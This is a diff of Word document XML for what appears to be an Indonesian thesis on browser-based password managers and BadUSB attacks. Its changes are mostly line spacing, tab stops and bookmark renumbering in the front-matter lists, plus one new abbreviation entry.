+          <w:szCs w:val="2"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -10216,6 +10294,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10296,6 +10375,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10376,6 +10456,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10466,6 +10547,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10546,6 +10628,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10641,6 +10724,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10721,6 +10805,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10811,6 +10896,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10901,6 +10987,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11009,6 +11096,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11099,6 +11187,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11197,6 +11286,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11295,6 +11385,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11411,6 +11502,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11491,6 +11583,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11578,10 +11671,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="626"/>
+        </w:tabs>
+        <w:spacing w:after="0"/>
         <w:ind w:right="44"/>
         <w:rPr>
           <w:noProof/>
+          <w:sz w:val="2"/>
+          <w:szCs w:val="2"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -11607,6 +11705,12 @@
           <w:lang w:val="es-ES"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="es-ES"/>
+        </w:rPr>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -11615,6 +11719,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11695,6 +11800,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11775,6 +11881,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11870,6 +11977,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -11950,6 +12058,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12048,6 +12157,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12146,6 +12256,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12261,6 +12372,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12359,6 +12471,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12439,6 +12552,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12537,6 +12651,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12635,6 +12750,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12733,6 +12849,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12813,6 +12930,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12893,6 +13011,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -12983,6 +13102,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13081,6 +13201,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13161,6 +13282,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13259,6 +13381,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13339,6 +13462,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13437,6 +13561,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13517,6 +13642,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13612,7 +13738,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="0"/>
         <w:ind w:right="44"/>
         <w:rPr>
           <w:lang w:val="es-ES"/>
@@ -13647,16 +13773,16 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="18" w:name="_Toc75146104"/>
-      <w:bookmarkStart w:id="19" w:name="_Toc463344419"/>
-      <w:bookmarkStart w:id="20" w:name="_Toc43264811"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc75146104"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc463344419"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc43264811"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR TABEL</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
-      <w:bookmarkEnd w:id="19"/>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13675,6 +13801,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
@@ -13759,11 +13886,14 @@
       <w:pPr>
         <w:pStyle w:val="TableofFigures"/>
         <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+          <w:tab w:val="left" w:pos="626"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0" w:firstLine="0"/>
         <w:rPr>
           <w:noProof/>
+          <w:sz w:val="2"/>
+          <w:szCs w:val="2"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -13789,6 +13919,14 @@
           <w:lang w:val="de-DE"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="2"/>
+          <w:szCs w:val="2"/>
+          <w:lang w:val="de-DE"/>
+        </w:rPr>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -13797,6 +13935,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13887,6 +14026,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -13977,6 +14117,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -14057,24 +14198,8 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0" w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="de-DE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="de-DE"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TableofFigures"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
-        </w:tabs>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -14083,6 +14208,12 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="de-DE"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="de-DE"/>
@@ -14173,6 +14304,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -14253,6 +14385,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:lang w:val="de-DE"/>
         </w:rPr>
@@ -14289,7 +14422,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc43264812"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc43264812"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -14300,7 +14433,7 @@
         </w:rPr>
         <w:t>ISTILAH</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15289,7 +15422,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc43264813"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc43264813"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -15300,7 +15433,7 @@
         </w:rPr>
         <w:t>SINGKATAN</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -15606,6 +15739,98 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>BPM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>rowser-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>ased</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">assword </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>anager</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -15614,9 +15839,9 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc75146106"/>
-      <w:bookmarkStart w:id="24" w:name="_Toc463344421"/>
-      <w:bookmarkStart w:id="25" w:name="_Toc43264814"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc75146106"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc463344421"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc43264814"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -15627,26 +15852,27 @@
       <w:r>
         <w:t>endahuluan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
-      <w:bookmarkEnd w:id="24"/>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc43264815"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc43264815"/>
       <w:r>
         <w:t>Latar Belakang</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
         <w:spacing w:after="120"/>
       </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Hlk43330248"/>
       <w:r>
         <w:t>Pada saat</w:t>
       </w:r>
@@ -15779,7 +16005,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Hlk32935731"/>
+      <w:bookmarkStart w:id="33" w:name="_Hlk32935731"/>
       <w:r>
         <w:t xml:space="preserve">Seiring dengan perkembangan sistem operasi Windows, aplikasi </w:t>
       </w:r>
@@ -15792,7 +16018,7 @@
       <w:r>
         <w:t xml:space="preserve"> juga berkembang pesat.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="33"/>
       <w:r>
         <w:t xml:space="preserve"> Berbagai aplikasi </w:t>
       </w:r>
@@ -15811,7 +16037,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="28" w:name="_Hlk32935753"/>
+      <w:bookmarkStart w:id="34" w:name="_Hlk32935753"/>
       <w:r>
         <w:t xml:space="preserve">Aplikasi </w:t>
       </w:r>
@@ -15866,7 +16092,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="34"/>
       <w:r>
         <w:t xml:space="preserve"> Salah satu fitur yang dimiliki oleh </w:t>
       </w:r>
@@ -15924,7 +16150,7 @@
       <w:r>
         <w:t xml:space="preserve"> yang membutuhkan akun pengguna untuk menjalankannya. </w:t>
       </w:r>
-      <w:bookmarkStart w:id="29" w:name="_Hlk32935850"/>
+      <w:bookmarkStart w:id="35" w:name="_Hlk32935850"/>
       <w:r>
         <w:t xml:space="preserve">Pada kenyataannya fitur menyimpan password pada </w:t>
       </w:r>
@@ -16024,7 +16250,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="35"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -16143,11 +16369,11 @@
       <w:r>
         <w:t xml:space="preserve">BadUSB merupakan perangkat USB yang dimanipulasi oleh penyerang, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="30" w:name="_Hlk32936326"/>
+      <w:bookmarkStart w:id="36" w:name="_Hlk32936326"/>
       <w:r>
         <w:t>agar saat terdeteksi oleh komputer target perangkat ini akan dikenali sebagai perangkat antar muka USB biasa, seperti keyboard komputer.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="36"/>
       <w:r>
         <w:t xml:space="preserve"> Bentuk serangan dari BadUSB semakin beragam pada saat ini yang meliputi USBdriveby, Evilduino, </w:t>
       </w:r>
@@ -16353,6 +16579,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16365,11 +16592,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc43264816"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc43264816"/>
       <w:r>
         <w:t>Rumusan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16506,11 +16733,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc43264817"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc43264817"/>
       <w:r>
         <w:t>Tujuan Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16653,11 +16880,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc43264818"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc43264818"/>
       <w:r>
         <w:t>Manfaat Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16772,11 +16999,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc43264819"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc43264819"/>
       <w:r>
         <w:t>Batasan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="40"/>
